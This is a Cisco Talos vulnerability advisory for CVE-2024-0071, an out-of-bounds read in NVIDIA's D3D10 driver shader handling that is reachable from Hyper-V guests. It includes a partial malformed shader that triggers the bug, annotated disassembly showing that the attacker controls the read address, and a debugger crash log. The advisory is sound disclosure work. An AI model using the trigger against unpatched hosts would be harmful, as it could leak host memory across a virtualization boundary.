CVE-2024-0071
An out-of-bounds read vulnerability exists in the Shader functionality of NVIDIA D3D10 Driver, Version 546.01, 31.0.15.4601. A specially crafted executable/shader file can lead to an out-of-bounds read. An attacker can provide a specially crafted shader file to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
NVIDIA D3D10 Driver NVIDIA D3D10 Driver, Version 546.01, 31.0.15.4601
D3D10 Driver - https://nvidia.com
7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-125 - Out-of-bounds Read
NVIDIA Graphics drivers are software for NVIDIA Graphics GPU installed on the PC, used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.
This vulnerability potentially could be triggered from guest machines running virtualization environments (ie. VMware, qemu, VirtualBox, etc.) in order to perform guest-to-host escape (demonstrated before in TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically this vulnerability could be also triggered from a web browser (using webGL and webassembly). We were able to trigger this vulnerability from HYPER-V guest using a RemoteFX feature, leading to executing the vulnerable code on the HYPER-V host (inside of the rdvgm.exe process). While the RemoteFX was recently deprecated by Microsoft, some older machines may still use this software.
This vulnerability can be triggered by supplying a malformed shader. This leads to out-of-bounds memory read problem in NVIDIA driver.
Example of shader triggering the bug: … dcl_output o0.xyzw dcl_temps 1 div r0.xy, v0.xyxx, cb0[0].xyxx sample r0.xyz, r0.xyxx, resource[0].xyzw, sampler[0] mov o0.xyz, r0.xyzx mov o16171776.w, l(1) ret
By specifying the output register number, which exceeds the declared range, it is possible to force the NVIDIA driver to read arbitrary memory data:
Vulnerable code is presented below:
00007FFE600A7B61 | 44:8B1B | mov r11d,dword ptr ds:[rbx] |
00007FFE600A7B64 | B8 02000012 | mov eax,12000002 |
00007FFE600A7B69 | 45:8B4D 28 | mov r9d,dword ptr ds:[r13+28] | *
00007FFE600A7B6D | 41:BC 34110000 | mov r12d,1134 |
00007FFE600A7B73 | 4C:8B56 20 | mov r10,qword ptr ds:[rsi+20] |
00007FFE600A7B77 | 41:83FB 1C | cmp r11d,1C |
00007FFE600A7B7B | 77 09 | ja nvwgf2umx.7FFE600A7B86 |
00007FFE600A7B7D | 44:0FA3D8 | bt eax,r11d |
00007FFE600A7B81 | 41:8BFC | mov edi,r12d |
00007FFE600A7B84 | 72 05 | jb nvwgf2umx.7FFE600A7B8B |
00007FFE600A7B86 | BF C8110000 | mov edi,11C8 |
00007FFE600A7B8B | 41:B8 34000000 | mov r8d,34 |
00007FFE600A7B91 | 41:8BD7 | mov edx,r15d |
00007FFE600A7B94 | 41:0FA3D6 | bt r14d,edx |
00007FFE600A7B98 | 73 26 | jae nvwgf2umx.7FFE600A7BC0 |
00007FFE600A7B9A | 46:8D3C8D 00000000 | lea r15d,qword ptr ds:[r9*4] | *
00007FFE600A7BA2 | 41:8D0C17 | lea ecx,qword ptr ds:[r15+rdx] | *
00007FFE600A7BA6 | 49:03CA | add rcx,r10 |
00007FFE600A7BA9 | 0FB60439 | movzx eax,byte ptr ds:[rcx+rdi] | * out-of-bounds read
The RCX register value (operand for memory read operation) is computed by multiplying the value provided by the attacker in the bytecode. Therefore, the attacker can control the address of the read operation. This leads to out-of-bounds read and potential memory leak (especially if the guest runs in a virtualized environment, allowing the attacker to use this attack to leak host data to the guest).
0:017> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Read
Key : Analysis.CPU.mSec
Value: 1312
Key : Analysis.Elapsed.mSec
Value: 9602
Key : Analysis.IO.Other.Mb
Value: 18
Key : Analysis.IO.Read.Mb
Value: 0
Key : Analysis.IO.Write.Mb
Value: 30
Key : Analysis.Init.CPU.mSec
Value: 624
Key : Analysis.Init.Elapsed.mSec
Value: 16333
Key : Analysis.Memory.CommitPeak.Mb
Value: 86
Key : Failure.Bucket
Value: INVALID_POINTER_READ_c0000005_nvwgf2umx.dll!Unknown
Key : Failure.Hash
Value: {7b367f86-064a-2e05-5dc0-760739d560ad}
Key : Timeline.OS.Boot.DeltaSec
Value: 591430
Key : Timeline.Process.Start.DeltaSec
Value: 16
Key : WER.OS.Branch
Value: vb_release
Key : WER.OS.Version
Value: 10.0.19041.1
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffe600a7ba9 (nvwgf2umx!NVENCODEAPI_Thunk+0x0000000000112949)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 00000297e058190b
Attempt to read from address 00000297e058190b
FAULTING_THREAD: 000018ec
PROCESS_NAME: POC_EXEC11.exe
READ_ADDRESS: 00000297e058190b
ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si do pami ci pod adresem 0x%p. Pami nie mo e by %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 00000297e058190b
STACK_TEXT:
000000d8`efb8e810 00007ffe`600ac664 : 000000d8`efb8ec80 00000002`00010000 00000297`dc7cb8e0 00000000`00000000 : nvwgf2umx!NVENCODEAPI_Thunk+0x112949
000000d8`efb8eaa0 00007ffe`6008f2e1 : 00000297`dc7cfb40 000000d8`efb8ef48 000000d8`efb8ef48 000000d8`efb8ec80 : nvwgf2umx!NVENCODEAPI_Thunk+0x117404
000000d8`efb8eb50 00007ffe`60242ae5 : 00007ffe`5fe00000 00006492`3dd45a97 00000297`dc7cfb40 00000000`00000001 : nvwgf2umx!NVENCODEAPI_Thunk+0xfa081
000000d8`efb8ee70 00007ffe`6007cfbd : 00007ffe`600c08b4 000000d8`efb8eee0 00000297`dc7cb8e0 00000000`00000001 : nvwgf2umx!NVAPI_Thunk+0x166e55
000000d8`efb8eea0 00007ffe`6007bf20 : 00000000`fffff865 000000d8`efb8f3d0 00000000`fffff80e 00000000`ffffffff : nvwgf2umx!NVENCODEAPI_Thunk+0xe7d5d
000000d8`efb8f350 00007ffe`5fecbe1f : 00000000`00000000 00000000`00000000 00000297`00000005 000000d8`efb8f7f0 : nvwgf2umx!NVENCODEAPI_Thunk+0xe6cc0
000000d8`efb8f400 00007ffe`5fecd40b : 00000297`d86e5280 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_DirectMethods+0x3ce0f
000000d8`efb8f4e0 00007ffe`616637fa : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_DirectMethods+0x3e3fb
000000d8`efb8f7c0 00007ffe`616634f8 : 00000000`00000000 00000297`d65f2700 00000000`00000000 00000297`dc80c760 : nvwgf2umx!NVDEV_Thunk+0x380ca
000000d8`efb8f8e0 00007ffe`61692fa3 : 00000000`00000000 00000000`00000000 00000297`d86d67c0 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x37dc8
000000d8`efb8f990 00007ffe`61692e9f : 00000000`00000000 00000297`dc91f5e0 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x67873
000000d8`efb8f9e0 00007ffe`61c418ee : 00000297`dc91f5e0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x6776f
000000d8`efb8fa10 00007fff`24307344 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x6161be
000000d8`efb8fa40 00007fff`25e826b1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000d8`efb8fa70 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
SYMBOL_NAME: nvwgf2umx+112949
MODULE_NAME: nvwgf2umx
IMAGE_NAME: nvwgf2umx.dll
STACK_COMMAND: ~17s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_nvwgf2umx.dll!Unknown
BUCKET_ID_MODPRIVATE: 1
OS_VERSION: 10.0.19041.1
BUILDLAB_STR: vb_release
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
IMAGE_VERSION: 31.0.15.4601
FAILURE_ID_HASH: {7b367f86-064a-2e05-5dc0-760739d560ad}
Followup: MachineOwner
---------
2023-11-15 - Vendor Disclosure
2024-02-28 - Vendor Patch Release
2024-02-29 - Public Release
Discovered by Piotr Bania of Cisco Talos.